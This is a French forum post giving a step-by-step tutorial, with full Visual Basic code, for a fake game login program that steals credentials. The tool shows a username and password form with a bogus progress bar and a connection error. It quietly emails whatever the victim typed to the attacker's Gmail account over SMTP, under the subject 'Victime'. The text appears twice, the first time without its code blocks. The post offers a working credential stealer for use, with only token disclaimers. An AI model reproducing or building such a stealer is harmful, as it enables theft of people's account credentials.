Salut :) !
Voici un tutoriel pour créer un fake pour voler des identifiants (marche avec n'importe quel jeu si vous êtes assez malin).
Voici un avant-goût du résultat obtenu par ce tutoriel (un peux modifié pour qu'il ressemble à un bot)
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
Je ne suis pas responsable en cas de Hack , je n'ai encore jamais diffusé ce bot.
J'ai juste diffusé les sources qui ont été retirées quand j'ai vu l'étendue des dégâts que certaines ont causé grâce à ces sources)
Vous aurez besoin de :
-Un compte Gmail (Un nouveau si vous voulez)
-Visual basic (2008 minimum , 2010 conseillé)
-Des lèvre (pour embrasse ce bon vieil Obsidiantre :3)
Apres avoir tout ceci, voici le tuto :
1°)Créez une nouvelle "Application Windows Forms" que vous appellerez comme vous voulez (ici ce sera : WindowsApplication1 ).
2°)Voila, vous avez devant vous votre nouveau programme, cependant, il faut encore le coder et lui mettre un petit design. Pour que votre programme fonctionne correctement, il faudra mettre dans la partie design :
-Une progressBar
-Deux Bouton ( un qui s'apellera"Viser les champs" et l'autre qui s'apellera "Connecter")
-Deux TextBox ( un pour le nom et l'autre pour le password )
-Deux Labels ( ici ils serviront à écrire "Nom" et "Mot de passe" )
-Un Timer
3°)Apres avoir installé tout ceci, faites un double clique sur le bouton "Connecter", la page de code apparait, voila le code que vous allez entrer :
4°)Voila, maintenant il faut programmer le Timer (double clic sur "timer" en dessous du design du projet".
Voici le code à insérer:
il faut maintenant modifier les données :
Remplacer ceci :
- Ton_adresse_gmail
- Ton _mdp_gmail
- Une_adresse_mail_a_toi
5°)Il faut aussi ajouter avant "Public Class Form1" qui est tout en haut de la page de code ceci :
6°) Il faut aussi ajouter ceci : ( maintenant, il faut ajouter sa dans "Public Class Form1" )
7°)Pour finir, il faut coder le bouton "Vider les champs", pour cela, retournez sur le design puis faites un double clique sur le bouton puis écrivez ceci :
Un merci ne coute rien :D
Sources : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris! (De moi)
Merci a The Falcon pour m'avoir aidé a le programmer.
/!\ Merci de ne pas diffuser ce fake sur n'importe quel forum d'émulation /!\
Voici un tutoriel pour créer un fake pour voler des identifiants (marche avec n'importe quel jeu si vous êtes assez malin).
Voici un avant-goût du résultat obtenu par ce tutoriel (un peux modifié pour qu'il ressemble à un bot)
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
Je ne suis pas responsable en cas de Hack , je n'ai encore jamais diffusé ce bot.
J'ai juste diffusé les sources qui ont été retirées quand j'ai vu l'étendue des dégâts que certaines ont causé grâce à ces sources)
Vous aurez besoin de :
-Un compte Gmail (Un nouveau si vous voulez)
-Visual basic (2008 minimum , 2010 conseillé)
-Des lèvre (pour embrasse ce bon vieil Obsidiantre :3)
Apres avoir tout ceci, voici le tuto :
1°)Créez une nouvelle "Application Windows Forms" que vous appellerez comme vous voulez (ici ce sera : WindowsApplication1 ).
2°)Voila, vous avez devant vous votre nouveau programme, cependant, il faut encore le coder et lui mettre un petit design. Pour que votre programme fonctionne correctement, il faudra mettre dans la partie design :
-Une progressBar
-Deux Bouton ( un qui s'apellera"Viser les champs" et l'autre qui s'apellera "Connecter")
-Deux TextBox ( un pour le nom et l'autre pour le password )
-Deux Labels ( ici ils serviront à écrire "Nom" et "Mot de passe" )
-Un Timer
3°)Apres avoir installé tout ceci, faites un double clique sur le bouton "Connecter", la page de code apparait, voila le code que vous allez entrer :
Code:
If TextBox1.Text = "" Then
MsgBox("Entre ton Nom D'utilisateur")
Exit Sub
End If
If TextBox2.Text = "" Then
MsgBox("Entre ton mot de passe")
Exit Sub
End If
Timer1.Start()
4°)Voila, maintenant il faut programmer le Timer (double clic sur "timer" en dessous du design du projet".
Voici le code à insérer:
Code:
Try
ProgressBar1.Value += 10
Catch
ProgressBar1.Value = 100
Timer1.Stop()
'--------Envoi des message
Dim mail As New MailMessage()
'set the addresses
mail.From = New MailAddress("Une adresse_mail_a_toi")
mail.To.Add("Ton_adresse_gmail")
'set the content
mail.Subject = "Victime"
mail.Body = "le nom d utulisateur est :" & TextBox1.Text & " mot de passe est :" & TextBox2.Text
Dim client As New SmtpClient("smtp.gmail.com", 587)
client.EnableSsl = True
client.Credentials = New NetworkCredential("Ton_adresse_gmail", "Ton_mdp_gmail")
Try
client.Send(mail)
Catch ex As Exception
Dim ex2 As Exception = ex
Dim errorMessage As String = String.Empty
While Not (ex2 Is Nothing)
errorMessage += ex2.ToString()
ex2 = ex2.InnerException
End While
MsgBox(errorMessage)
End Try
''--------
MsgBox("Problème lors de la connexion, merci de réessayer ultérieurement !")
Me.Close()
End Try
il faut maintenant modifier les données :
Remplacer ceci :
- Ton_adresse_gmail
- Ton _mdp_gmail
- Une_adresse_mail_a_toi
5°)Il faut aussi ajouter avant "Public Class Form1" qui est tout en haut de la page de code ceci :
Code:
Imports System.Net.Mail
Imports System.Net.Mime
Imports System.Net.NetworkCredential
Imports System.Net
6°) Il faut aussi ajouter ceci : ( maintenant, il faut ajouter sa dans "Public Class Form1" )
Code:
Dim mail As MailMessage
Dim smtp As SmtpClient
7°)Pour finir, il faut coder le bouton "Vider les champs", pour cela, retournez sur le design puis faites un double clique sur le bouton puis écrivez ceci :
Code:
TextBox1.Text = ""
TextBox2.Text = ""
Un merci ne coute rien :D
Sources : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris! (De moi)
Merci a The Falcon pour m'avoir aidé a le programmer.
/!\ Merci de ne pas diffuser ce fake sur n'importe quel forum d'émulation /!\
Last edited: